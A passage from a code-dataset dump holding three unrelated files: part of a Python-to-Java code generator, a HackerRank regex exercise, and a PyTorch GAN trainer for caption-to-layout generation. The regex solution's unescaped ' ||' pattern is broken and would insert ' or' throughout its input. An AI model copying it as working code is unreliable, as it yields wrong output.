self._format(res) or None\n\n\tdef writeFunctionPost(self, function ):\n\t\tres = []\n\t\tfor a in function.annotations(withName=\"post\"):\n\t\t\tres.append(\"if (!(%s)) {throw new Exception('Assertion failed')}\" % (self.write(a.getContent())))\n\t\treturn self._format(res) or None\n\t\n\tdef writeFunction( self, function ):\n\t\t\"\"\"Writes a function element.\"\"\"\n\t\tparent = function.getParent()\n\t\tname = function.getName()\n\t\tresult = self.rt.valueClass()\n\t\targs = \", \".join(map(self.write, function.getArguments()))\n\t\treturns = [self.writeImplicitReturn(function)]\n\t\tif name == interfaces.Constants.MainFunction:\n\t\t\tname = \"main\"\n\t\t\tresult = \"void\"\n\t\t\targs = \"String[] args\"\n\t\t\treturns = ()\n\t\telif name == interfaces.Constants.ModuleInit:\n\t\t\tname = \"moduleInit\"\n\t\t\tresult = \"void\"\n\t\t\treturns = ()\n\t\tif parent and isinstance(parent, interfaces.IModule):\n\t\t\tres = [\n\t\t\t\t\"public static %s %s (%s){\" % (\n\t\t\t\t\tresult,\n\t\t\t\t\tname,\n\t\t\t\t\targs,\n\t\t\t\t),\n\t\t\t\t[self._document(function)],\n\t\t\t\tself.writeFunctionWhen(function),\n\t\t\t\tmap(self.writeStatement, function.getOperations()),\n\t\t\t\treturns,\n\t\t\t\t\"}\"\n\t\t\t]\n\t\t\treturn res\n\t\telse:\n\t\t\targs = []\n\t\t\ti = 0\n\t\t\tfor a in function.getArguments():\n\t\t\t\targs.append(\"java.lang.Object %s=%s(args[%s]);\" % (\n\t\t\t\t\ta.getReferenceName(),\n\t\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\t\ti\n\t\t\t\t))\n\t\t\t\ti += 1\n\t\t\tres = [\n\t\t\t\t\"new %s() { public java.lang.Object do(java.lang.Object[] args) {\" % (self.rt.op(\"Closure\")),\n\t\t\t\targs,\n\t\t\t\tmap(self.writeStatement, function.getOperations()),\n\t\t\t\t\"}}\"\n\t\t\t]\n\t\t\treturn res\n\n\tdef writeBlock( self, block ):\n\t\t\"\"\"Writes a block element.\"\"\"\n\t\treturn self._format(\n\t\t\t\"{\",\n\t\t\tmap(self.write, block.getOperations()),\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeArgument( self, argElement ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\treturn \"%s %s\" % (\n\t\t\tself.rt.valueClass(),\n\t\t\targElement.getReferenceName(),\n\t\t)\n\n\tdef writeAttribute( self, element ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\treturn self._format(\n\t\t\tself._document(element),\n\t\t\t'public %s %s;' % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\telement.getReferenceName()\n\t\t\t)\n\t\t)\n\n\tdef writeClassAttribute( self, element ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\tdefault_value = element.getDefaultValue()\n\t\tclass_name = self.getAbsoluteName(self.getCurrentClass())\n\t\tif default_value:\n\t\t\treturn \"public static %s %s = (%s)%s(%s);\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\telement.getReferenceName(),\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\tself.write(default_value)\n\t\t\t)\n\t\telse:\n\t\t\treturn \"public static %s %s;\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\telement.getReferenceName()\n\t\t\t)\n\n\tdef writeReference( self, element ):\n\t\t\"\"\"Writes an argument element.\"\"\"\n\t\tsymbol_name = element.getReferenceName()\n\t\tvalue, scope = self.resolve(symbol_name)\n\t\tif scope and scope.hasSlot(symbol_name):\n\t\t\tvalue = scope.getSlot(symbol_name)\n\t\tif symbol_name == \"self\":\n\t\t\treturn \"this\"\n\t\telif symbol_name == \"super\":\n\t\t\tassert self.resolve(\"this\"), \"Super must be used inside method\"\n\t\t\t# FIXME: Should check that the element has a method in parent scope\n\t\t\treturn \"super\"\n\t\t# If there is no scope, then the symmbol is undefined\n\t\tif not scope:\n\t\t\tif symbol_name == \"print\":\n\t\t\t\treturn '%s(lambdafactory.Runtime.class,\"print\")' % (self.rt.op(\"resolve\"))\n\t\t\telse:\n\t\t\t\treturn symbol_name\n\t\t# It is a method/property of the current class\n\t\telif self.getCurrentClass() == scope:\n\t\t\tif isinstance(value, interfaces.IInstanceMethod):\n\t\t\t\treturn \"Runtime.resolveMethod(this,'%s')\" % (symbol_name)\n\t\t\telif isinstance(value, interfaces.IClassMethod):\n\t\t\t\treturn \"Runtime.resolveClassMethod(this,'%s')\" % (symbol_name)\n\t\t\telif isinstance(value, interfaces.IClassAttribute):\n\t\t\t\treturn \"%s\" % (symbol_name)\n\t\t\telse:\n\t\t\t\tassert isinstance(value, interfaces.IAttribute)\n\t\t\t\treturn \"%s\" % (symbol_name)\n\t\t# It is a local variable\n\t\telif self.getCurrentFunction() == scope:\n\t\t\treturn symbol_name\n\t\t# It is a property of a module\n\t\telif isinstance(scope, interfaces.IModule):\n\t\t\tnames = [scope.getName(), symbol_name]\n\t\t\twhile scope.getParent():\n\t\t\t\tscope = scope.getParent()\n\t\t\t\tif not isinstance(scope, interfaces.IProgram):\n\t\t\t\t\tnames.insert(0, scope.getName())\n\t\t\t# In Java, you cannot reference classes directly, so if you have\n\t\t\t# class 'org.pouet.MyClass' you have to reference it by using\n\t\t\t# 'org.pouet.MyClass.class'\n\t\t\tif isinstance(value, interfaces.IClass):\n\t\t\t\tnames.append(\"class\")\n\t\t\treturn \".\".join(names)\n\t\t# It is a property of a class\n\t\telif isinstance(scope, interfaces.IClass):\n\t\t\t# And the class is one of the parent class\n\t\t\tif scope in self.getCurrentClassAncestors():\n\t\t\t\treturn \"$G(self,%s)\" % (symbol_name)\n\t\t\t# Otherwise it is an outside class, and we have to check that the\n\t\t\t# value is not an instance slot\n\t\t\telse:\n\t\t\t\tnames = [scope.getName()]\n\t\t\t\twhile scope.getParent():\n\t\t\t\t\tscope = scope.getParent()\n\t\t\t\t\tnames.insert(0, scope.getName())\n\t\t\t\treturn \"$G(%s,%s)\" % (\"_\".join(names), symbol_name)\n\t\t# FIXME: This is an exception... iteration being an operation, not a\n\t\t# context...\n\t\telif isinstance(scope, interfaces.IIteration):\n\t\t\treturn symbol_name\n\t\telif isinstance(scope, interfaces.IClosure):\n\t\t\treturn symbol_name\n\t\telse:\n\t\t\traise Exception(\"Unsupported scope:\" + str(scope))\n\n\tJAVA_OPERATORS = {\n\t\t\t\t\"and\":\"&&\",\n\t\t\t\t\"is\":\"==\",\n\t\t\t\t\"is not\":\"!=\",\n\t\t\t\t\"not\":\"!\",\n\t\t\t\t\"or\":\"||\"\n\t}\n\tdef writeOperator( self, operator ):\n\t\t\"\"\"Writes an operator element.\"\"\"\n\t\to = operator.getReferenceName()\n\t\to = self.JAVA_OPERATORS.get(o) or o\n\t\treturn \"%s\" % (o)\n\n\tdef writeNumber( self, number ):\n\t\t\"\"\"Writes a number element.\"\"\"\n\t\treturn \"%s\" % (number.getActualValue())\n\n\tdef writeString( self, element ):\n\t\t\"\"\"Writes a string element.\"\"\"\n\t\treturn '\"%s\"' % (element.getActualValue().replace('\"', '\\\\\"'))\n\n\tdef writeList( self, element ):\n\t\t\"\"\"Writes a list element.\"\"\"\n\t\treturn '%s(new Object[] [%s])' % (self.op(\"list\"),\n\t\t\t\", \".join([ self.write(e) for e in element.getValues()]))\n\n\tdef writeDictKey( self, key ):\n\t\tif isinstance(key, interfaces.IString):\n\t\t\treturn self.write(key)\n\t\telse:\n\t\t\t# FIXME: Raise an error, because JavaScript only allow strings as keys\n\t\t\treturn \"(%s)\" % (self.write(key))\n\n\tdef writeDict( self, element ):\n\t\treturn '%s(%s)' % (self.rt.op(\"dict\"),\n\t\t\t\", \".join([\n\t\t\t\t\"%s:%s\" % ( self.writeDictKey(k),self.write(v))\n\t\t\t\tfor k,v in element.getItems()\n\t\t\t])\n\t\t)\n\t\t\n\tdef writeAllocation( self, allocation ):\n\t\t\"\"\"Writes an allocation operation.\"\"\"\n\t\ts = allocation.getSlotToAllocate()\n\t\tv = allocation.getDefaultValue()\n\t\tif v:\n\t\t\treturn \"%s %s=%s(%s)\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\ts.getReferenceName(),\n\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\tself.write(v)\n\t\t\t)\n\t\telse:\n\t\t\treturn \"%s %s\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\ts.getReferenceName()\n\t\t\t)\n\n\tdef writeAssignation( self, assignation ):\n\t\t\"\"\"Writes an assignation operation.\"\"\"\n\t\treturn \"%s = %s(%s)\" % (\n\t\t\tself.write(assignation.getTarget()),\n\t\t\tself.rt.op(\"box\"),\n\t\t\tself.write(assignation.getAssignedValue())\n\t\t)\n\n\tdef writeEnumeration( self, operation ):\n\t\t\"\"\"Writes an enumeration operation.\"\"\"\n\t\tstart = operation.getStart() \n\t\tend = operation.getEnd() \n\t\tif isinstance(start, interfaces.ILiteral): start = self.write(start)\n\t\telse: start = \"(%s)\" % (self.write(start))\n\t\tif isinstance(end, interfaces.ILiteral): end = self.write(end)\n\t\telse: end = \"(%s)\" % (self.write(end))\n\t\tres = \"%s(%s,%s)\" % (self.rt.op(\"range\"), start, end)\n\t\tstep = operation.getStep()\n\t\tif step: res += \" step \" + self._write(step)\n\t\treturn res\n\n\tdef writeResolution( self, resolution ):\n\t\t\"\"\"Writes a resolution operation.\"\"\"\n\t\tif resolution.getContext():\n\t\t\treturn '%s(%s,\"%s\")' % (self.rt.op(\"resolve\"),self.write(resolution.getContext()), resolution.getReference().getReferenceName())\n\t\telse:\n\t\t\treturn \"%s\" % (resolution.getReference().getReferenceName())\n\n\tdef isLiteral( self, element ):\n\t\tif isinstance( element, interfaces.IComputation ):\n\t\t\tfor o in element.getOperands():\n\t\t\t\tif not self.isLiteral(o):\n\t\t\t\t\treturn False\n\t\t\treturn True\n\t\telse:\n\t\t\treturn isinstance(element, interfaces.ILiteral)\n\n\tdef writeComputation( self, computation ):\n\t\t\"\"\"Writes a computation operation.\"\"\"\n\t\t# FIXME: For now, we supposed operator is prefix or infix\n\t\toperands = filter(lambda x:x!=None,computation.getOperands())\n\t\toperator = computation.getOperator()\n\t\t# FIXME: Add rules to remove unnecessary parens\n\t\tif len(operands) == 1:\n\t\t\toperand = operands[0]\n\t\t\tif self.isLiteral(operand):\n\t\t\t\tres = \"%s %s\" % (\n\t\t\t\t\tself.write(operator),\n\t\t\t\t\tself.write(operand)\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tres = \"%s(%s)\" % (\n\t\t\t\t\tself.rt.compute(self.write(operator)),\n\t\t\t\t\tself.write(operand)\n\t\t\t\t)\n\t\telse:\n\t\t\ta = operands[0]\n\t\t\tb = operands[1]\n\t\t\tif self.isLiteral(computation):\n\t\t\t\tres = \"%s %s %s\" % (\n\t\t\t\t\tself.write(operands[0]),\n\t\t\t\t\tself.write(operator),\n\t\t\t\t\tself.write(operands[1])\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tres = '%s(%s,%s)' % (\n\t\t\t\t\tself.rt.compute(self.write(operator)),\n\t\t\t\t\tself.write(operands[0]),\n\t\t\t\t\tself.write(operands[1])\n\t\t\t\t)\n\n\t\tif filter(lambda x:isinstance(x, interfaces.IComputation), self.contexts[:-1]):\n\t\t\tres = \"(%s)\" % (res)\n\t\treturn res\n\n\tdef writeInvocation( self, invocation ):\n\t\t\"\"\"Writes an invocation operation.\"\"\"\n\t\tself.inInvocation = True\n\t\tt = self.write(invocation.getTarget())\n\t\tself.inInvocation = False\n\t\tif t == \"super\":\n\t\t\treturn \"super(%s)\" % (\n\t\t\t\t\", \".join(map(self.write, invocation.getArguments()))\n\t\t\t)\n\t\telse:\n\t\t\treturn \"%s(%s, new Object[]{%s})\" % (\n\t\t\t\tself.rt.op(\"invoke\"),\n\t\t\t\tt,\n\t\t\t\t\", \".join(map(self.write, invocation.getArguments()))\n\t\t\t)\n\t\n\tdef writeInstanciation( self, operation ):\n\t\t\"\"\"Writes an invocation operation.\"\"\"\n\t\tlen_args = len(operation.getArguments())\n\t\tclass_name = self.write(operation.getInstanciable())\n\t\tassert class_name.endswith(\".class\")\n\t\tclass_name = class_name[:-len(\".class\")]\n\t\tif len_args == 0:\n\t\t\treturn \"new %s()\" % (class_name)\n\t\telse:\n\t\t\treturn \"new %s(%s)\" % (\n\t\t\t\tclass_name,\n\t\t\t\t\", \".join(\"%s(%s)\" % (self.rt.op(\"box\"),self.write(a)) for a in operation.getArguments())\n\t\t\t)\n\n\tdef writeSelection( self, selection ):\n\t\trules = selection.getRules()\n\t\tresult = []\n\t\tfor i in range(0,len(rules)):\n\t\t\trule = rules[i]\n\t\t\tprocess = rule.getProcess() \n\t\t\t# If the rule process is a block/closure, we simply expand the\n\t\t\t# closure. So we have\n\t\t\t# if (...) { code }\n\t\t\t# instead of\n\t\t\t# if (...) { (function(){code})() }\n\t\t\tif process and isinstance(process, interfaces.IClosure):\n\t\t\t\tprocess = self.writeClosureBody(process)\n\t\t\telif process:\n\t\t\t\tprocess = \"%s\" % (self.write(process))\n\t\t\telse:\n\t\t\t\tprocess = '{}'\n\t\t\tif i==0:\n\t\t\t\trule_code = (\n\t\t\t\t\t\"if ( %s )\" % (self.write(rule.getPredicate())),\n\t\t\t\t\tprocess,\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\trule_code = (\n\t\t\t\t\t\"else if ( %s )\" % (self.write(rule.getPredicate())),\n\t\t\t\t\tprocess,\n\t\t\t\t)\n\t\t\tresult.extend(rule_code)\n\t\treturn self._format(*result)\n\n\tdef writeIteration( self, iteration ):\n\t\t\"\"\"Writes a iteration operation.\"\"\"\n\t\tit_name = self._unique(\"_iterator\")\n\t\treturn self._format(\n\t\t\tself.rt.op(\"iterate(%s,\") % (self.write(iteration.getIterator())),\n\t\t\tself.write(iteration.getClosure()),\n\t\t\t\")\"\n\t\t)\n\n\tdef writeSliceOperation( self, operation ):\n\t\treturn self._format(\n\t\t\tself.runtime.slice(operation.getTarget(), operation.getSlice()) \n\t\t)\n\n\tdef writeEvaluation( self, operation ):\n\t\t\"\"\"Writes an evaluation operation.\"\"\"\n\t\treturn \"%s\" % ( self.write(operation.getEvaluable()) )\n\n\tdef writeTermination( self, termination ):\n\t\t\"\"\"Writes a termination operation.\"\"\"\n\t\treturn \"return %s(%s)\" % (\n\t\t\tself.rt.op(\"box\"),\n\t\t\tself.write(termination.getReturnedEvaluable())\n\t\t)\n\n\tdef writeStatement(self, *args):\n\t\treturn self.write(*args) + \";\"\n\t\n\tdef _document( self, element ):\n\t\tif element.hasDocumentation():\n\t\t\tdoc = element.getDocumentation()\n\t\t\tres = []\n\t\t\tfor line in doc.getContent().split(\"\\n\"):\n\t\t\t\tres.append(\"// \" + line)\n\t\t\treturn \"\\n\".join(res)\n\t\telse:\n\t\t\treturn None\n\n# EOF\n","sub_path":"Sources/python/lambdafactory/languages/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":20573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628239077","text":"# import re\r\n\r\n# n = int(input())\r\n\r\n# for i in range(n):\r\n# print(re.sub(r'(?<= )(&&|\\|\\|)(?= )', lambda x: 'and' if x.group() == '&&' else 'or', input()))\r\n\r\nimport re\r\n\r\nfor _ in range(int(input())):\r\n s = input()\r\n s = re.sub(r\" &&(?= )\", \" and\", s)\r\n s = re.sub(r\" ||(?= )\", ' or', s)\r\n print(s)\r\n\r\n\r\n\r\n","sub_path":"onlinecoding/hackerrank/python/20-6-19/regex/substitute.py","file_name":"substitute.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236288150","text":"import torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data.dataloader import DataLoader\nimport random\nfrom components.discriminator_CNN import Discriminator\nfrom dataloaders.dataset_coco import DatasetCOCO\nfrom models.model_core_new import CoreModel\nfrom utils.constants import *\nfrom utils.criteria import *\n\n\ndef calculate_criteria(predicted_boxes, predicted_labels, boxes, labels, key_number):\n predicted_labels = predicted_labels.contiguous().view(-1)\n target_labels = labels.contiguous().view(-1)\n predicted_boxes = predicted_boxes.contiguous().view(-1, 4)\n target_boxes = boxes.contiguous().view(-1, 4)\n return classification_score(predicted_labels, target_labels), \\\n classification_score(predicted_labels[:key_number], target_labels[:key_number]), \\\n IoU_score(predicted_boxes, target_boxes, predicted_labels, target_labels), \\\n IoU_score(predicted_boxes[:key_number], target_boxes[:key_number],\n predicted_labels[:key_number], target_labels[:key_number])\n\n\ndef label2word(labels):\n word_list = []\n with open('./config/COCO/label.json', \"r\") as label_json:\n label_dict = json.load(label_json)\n for label in labels:\n word_list.append(label_dict[str(int(label.item()))])\n return word_list\n\n\ndef stepFromEpoch(epoch):\n return int(1 / (0.2 + 0.8 * math.exp(-epoch)))\n # return 1\n\nclass GANTrainer(object):\n def __init__(self, model_name=\"GAN\", device=\"cuda:2\"):\n super().__init__()\n encoder_config = load_json(\"./config/param/encoder.json\")\n gan_config = load_json(\"./config/param/gan.json\")\n data_config = load_json(\"./config/param/data_loader.json\")\n train_data_config = data_config['train']\n val_data_config = data_config['val']\n common_data_config = data_config['common']\n train_data_config.update(common_data_config)\n val_data_config.update(common_data_config)\n self.params = gan_config\n self.device = torch.device(device if torch.cuda.is_available() else 'cpu')\n self.model_name = model_name\n print(self.device)\n\n train_dataset = DatasetCOCO(params=train_data_config)\n print(\"Train Dataset Loaded!\")\n val_dataset = DatasetCOCO(params=val_data_config)\n print(\"Val Dataset Loaded!\")\n\n self.train_data_loader = DataLoader(dataset=train_dataset, batch_size=self.params['batch_size'],\n num_workers=4, shuffle=True)\n self.val_data_loader = DataLoader(dataset=val_dataset, batch_size=self.params['batch_size'],\n num_workers=4, shuffle=False)\n\n # self.sampleModel = SampleModel({\n # 'encoder_config': encoder_config,\n # 'mlp_config': mlp_config,\n # 'device': self.device,\n # 'params': {\n # 'alpha': sample_config['alpha']\n # }\n # })\n # self.load(self.sampleModel, './saved/SampleModel-19.pt')\n gan_config.update({\n 'encoder_config': encoder_config,\n 'device': self.device\n })\n self.generator = CoreModel(gan_config).to(self.device)\n self.discriminator = Discriminator().to(self.device)\n self.criterion = nn.BCELoss()\n print(\"Model initialized!\")\n self.generator_optimizer = optim.Adam(self.generator.parameters(), lr=self.params['learning_rate'])\n self.discriminator_optimizer = optim.Adam(self.discriminator.parameters(), lr=self.params['learning_rate'])\n\n def generator_pre_train(self, epoch):\n self.generator.train()\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.train_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n # captions: (batch_size, max_word_num, word_embedding_dim)\n # boxes: (batch_size, max_bbox_num, 4)\n # label: (batch_size, max_bbox_num)\n # caption_length, box_number: (batch_size)\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n # print(label_order)\n box_output, loss_iteration = self.generator(labels, captions, caption_lengths, label_order,\n key_mask, other_mask, True, boxes)\n mean_loss = torch.mean(loss_iteration)\n self.generator_optimizer.zero_grad()\n mean_loss.backward()\n # print(\"Attention Weight:\", self.coreModel.predict_module.text_attention.final.weight)\n # print(\"Attention Grad:\", self.coreModel.predict_module.text_attention.final.weight.grad)\n self.generator_optimizer.step()\n if iteration % self.params['print_every'] == 0:\n print_divider(log=False)\n item_number = torch.sum((key_mask[0] + other_mask[0]), dim=-1)\n print(\"Epoch: {}, Iteration: {}, Loss: {} \".format(epoch, iteration, mean_loss))\n # print(box_output[0][:item_number])\n # print(boxes[0][:item_number])\n _, _, iou_score_inst, iou_key_score_inst = calculate_criteria(\n predicted_boxes=box_output[0][:item_number],\n predicted_labels=labels[0][:item_number],\n boxes=boxes[0][:item_number],\n labels=labels[0][:item_number],\n key_number=key_numbers[0])\n # print(box_output[0][:min(item_number.item(), 8)])\n # print(boxes[0][:min(item_number.item(), 8)])\n print(\"IoU_score: {}, Key IoU_score: {}\".format(iou_score_inst, iou_key_score_inst))\n self.save(self.generator, self.params['saved_path'] + \"PreTrain-{}.pt\".format(epoch))\n avg_total_iou, avg_total_key_iou, avg_total_cover = self.generator_evaluate(preTrain=True)\n return avg_total_iou, avg_total_key_iou, avg_total_cover\n\n def generator_train(self):\n self.generator.train()\n self.discriminator.train()\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.train_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n # captions: (batch_size, max_word_num, word_embedding_dim)\n # boxes: (batch_size, max_bbox_num, 4)\n # label: (batch_size, max_bbox_num)\n # caption_length, box_number: (batch_size)\n captions = captions.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_output, box_loss = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask,\n False, boxes)\n result = self.discriminator(captions, caption_lengths, labels, box_output, box_numbers, label_order)\n g_loss = self.criterion(result, torch.ones_like(result).to(device=result.device))\n self.generator_optimizer.zero_grad()\n result_loss = g_loss # + box_loss # alpha = 1\n # print(\"g_loss: \", g_loss)\n # print(\"box_loss: \", box_loss)\n result_loss.backward()\n self.generator_optimizer.step()\n # print(\"Weight: \", self.generator.adjust_layer.predict_module.text_attention.final.weight)\n # print(\"Gradient: \", self.generator.adjust_layer.predict_module.text_attention.final.weight.grad)\n if iteration % self.params['print_every'] == 0:\n print_divider(log=False)\n item_number = torch.sum((key_mask[0] + other_mask[0]), dim=-1)\n print(\"Iteration: {}, Loss: {} \".format(iteration, result_loss))\n # print(box_output[0][:item_number])\n # print(boxes[0][:item_number])\n _, _, iou_score_inst, iou_key_score_inst = calculate_criteria(\n predicted_boxes=box_output[0][:item_number],\n predicted_labels=labels[0][:item_number],\n boxes=boxes[0][:item_number],\n labels=labels[0][:item_number],\n key_number=key_numbers[0])\n print(\"Prediction:\", box_output[0][:min(item_number.item(), 8)])\n print(\"Target:\", boxes[0][:min(item_number.item(), 8)])\n print(\"Discriminator Result: \", torch.mean(result.squeeze()))\n print(\"g_loss: \", g_loss)\n print(\"box loss: \", box_loss)\n print(\"IoU_score: {}, Key IoU_score: {}\".format(iou_score_inst, iou_key_score_inst))\n\n def discriminator_train(self):\n self.generator.eval()\n self.discriminator.train()\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.train_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n # captions: (batch_size, max_word_num, word_embedding_dim)\n # boxes: (batch_size, max_bbox_num, 4)\n # label: (batch_size, max_bbox_num)\n # caption_length, box_number: (batch_size)\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n box_output, _ = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask, False)\n box_output = box_output.detach()\n fake_result = self.discriminator(captions, caption_lengths, labels, box_output, box_numbers,\n label_order)\n real_result = self.discriminator(captions, caption_lengths, labels, boxes, box_numbers, label_order)\n fake_output = fake_result > 0.5\n # print(\"Fake OUTPUT:\", fake_output.squeeze())\n real_output = real_result > 0.5\n # print(\"Real OUTPUT:\", real_output.squeeze())\n fake_accuracy = torch.sum(fake_output == 0).float() / self.params['batch_size']\n real_accuracy = torch.sum(real_output == 1).float() / self.params['batch_size']\n d_fake_error = self.criterion(fake_result, torch.zeros_like(fake_result).to(device=fake_result.device))\n d_real_error = self.criterion(real_result, torch.ones_like(real_result).to(device=real_result.device))\n self.discriminator_optimizer.zero_grad()\n result_loss = d_fake_error + d_real_error\n result_loss.backward()\n self.discriminator_optimizer.step()\n if iteration % self.params['print_every'] == 0:\n print(\"Iteration : {}, Fake Acc: {}, Real Acc : {}\".format(iteration, fake_accuracy, real_accuracy))\n print(\"Discriminator Result(Fake): \", torch.mean(fake_result.squeeze()))\n print(\"Discriminator Result(Real): \", torch.mean(real_result.squeeze()))\n self.discriminator_evaluate()\n\n def train(self, load=False):\n print(\"Begin to train\")\n if load:\n self.load(self.generator, self.params['saved_path'] + \"PreTrain-2.pt\")\n else:\n last_avg_total_iou = last_avg_total_key_iou = last_avg_total_cover = 0\n last_epoch = 0\n for epoch in range(self.params['pre_epoch_num']):\n avg_total_iou, avg_total_key_iou, avg_total_cover = self.generator_pre_train(epoch)\n if avg_total_iou <= last_avg_total_iou and epoch - last_epoch >= 5:\n print(\"Early Stop!\")\n break\n if last_avg_total_iou <= avg_total_iou:\n last_avg_total_key_iou, last_avg_total_cover, last_avg_total_iou = avg_total_key_iou, avg_total_cover, avg_total_iou\n last_epoch = epoch\n print(\"Best Average Key IoU: {}, Best Average IoU: {}, Best Coverage: {}, Epoch : {}\".format(\n last_avg_total_key_iou,\n last_avg_total_iou,\n last_avg_total_cover,\n last_epoch))\n\n for epoch in range(self.params['epoch_num']):\n print(\"No. {} Epoch\".format(epoch))\n step = stepFromEpoch(epoch)\n for d_index in range(1):\n print(\"Begin to train Discriminator: No.{} step\".format(d_index))\n self.discriminator_train() # todo: fix it\n\n # Evaluate Discriminator\n print(\"Discriminator Evaluate Result for Epoch {}\".format(epoch))\n self.save(self.discriminator, self.params['saved_path'] + \"Dis-{}.pt\".format(epoch))\n self.discriminator_evaluate() # todo: fix it\n\n for g_index in range(step):\n print(\"Begin to train Generator: No.{} step\".format(g_index))\n self.generator_train() # todo: fix it\n\n # Evaluate Generator\n print(\"Generator Evaluate Result for Epoch {}\".format(epoch))\n self.save(self.generator, self.params['saved_path'] + \"Gen-{}.pt\".format(epoch))\n avg_total_iou, avg_total_key_iou, avg_total_cover = self.generator_evaluate(preTrain=False) # todo: fix it\n\n def discriminator_evaluate(self, model_path=None):\n self.discriminator.eval()\n self.generator.eval()\n if model_path is not None:\n self.load(self.discriminator, model_path)\n total_accuracy = []\n with torch.no_grad():\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.val_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_output, _ = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask,\n False)\n box_output = box_output.detach()\n choice = random.randint(0, 1)\n if choice == 1:\n result = self.discriminator(captions, caption_lengths, labels, boxes, box_numbers, label_order)\n else:\n result = self.discriminator(captions, caption_lengths, labels, box_output, box_numbers, label_order)\n predicted = result > 0.5\n target = torch.zeros_like(predicted) + choice\n accuracy = torch.sum(predicted == target).float() / target.size(0)\n total_accuracy.append(accuracy)\n avg_accuracy = sum(total_accuracy) / len(total_accuracy)\n print(\"Evaluate Result: Average Accuracy: {}\".format(avg_accuracy))\n\n def generator_evaluate(self, preTrain=False, model_path=None):\n total_iou = []\n total_key_iou = []\n total_cover = []\n if model_path is not None:\n self.load(self.generator, model_path)\n self.discriminator.eval()\n self.generator.eval()\n with torch.no_grad():\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.val_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n\n iou_score_iteration = []\n iou_key_score_iteration = []\n cover_percent_iteration = []\n box_output, _ = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask,\n preTrain)\n for batch_idx in range(captions.size(0)):\n box_output_inst = box_output[batch_idx]\n box_target_inst = boxes[batch_idx]\n label_output_inst = label_target_inst = labels[batch_idx]\n key_number_inst = key_numbers[batch_idx]\n box_number_inst = box_numbers[batch_idx]\n _, _, iou_score_inst, iou_key_score_inst = calculate_criteria(\n 